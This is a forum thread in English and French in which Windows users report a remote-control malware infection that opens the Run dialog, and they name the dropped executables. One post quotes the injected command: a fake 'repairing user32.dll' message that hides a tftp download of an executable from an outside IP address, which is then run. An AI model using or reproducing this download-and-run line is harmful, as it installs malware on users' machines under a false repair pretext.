Hello. I am sorry but my French is very bad. I am having the same exact computer problem that you are. This is the only reference to the problem that I found on the internet. I found your post by copy and pasting the IP address, which is the same one that comes up in my "run" dialog box in Windows. Unfortunately I do not know anything more than you do, but hopefully we can find the program on the computer that is causing this.
mode francais:
Alors ce message est enfait un message d'un pirate qui se rate.
Sauf qu'aujourdhui (enfin samedi) il ne s'est pas raté.
il effectue enfait une prise de controle à distance, essaye d'envoyer un "Windows+R" (éxécuter) pour lancer la commande.
Cela envoit 2 virus sur la machine:
msgscy.exe
mscgy.exe
ca prend 50% d'uc par user sur la machine.
Moi c'est arrivé sur mon serveur TSE, jvous laisse imaginer le resultat....
--------------- Sooz Rofl, j'ai du taff au boulot maintenant
J'ai le meme probleme sous Vista.
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 67.71.3.90 GET qisnqk.exe & start qisnqk&
Voici ce qu'il me lance quelque fois dnas la journée, souvent vers 20h et la à la pause de midi.
D'apres ce que j'ai lu je ne retrouve plus le lien malheuresement ca viendrai d'une faille avec VNC.
Souci, j'ai ce probleme que depus que je suis sous vista poru ma part et avant sous xp sp2 j'avias le serveur vnc a longueur de journée et rien.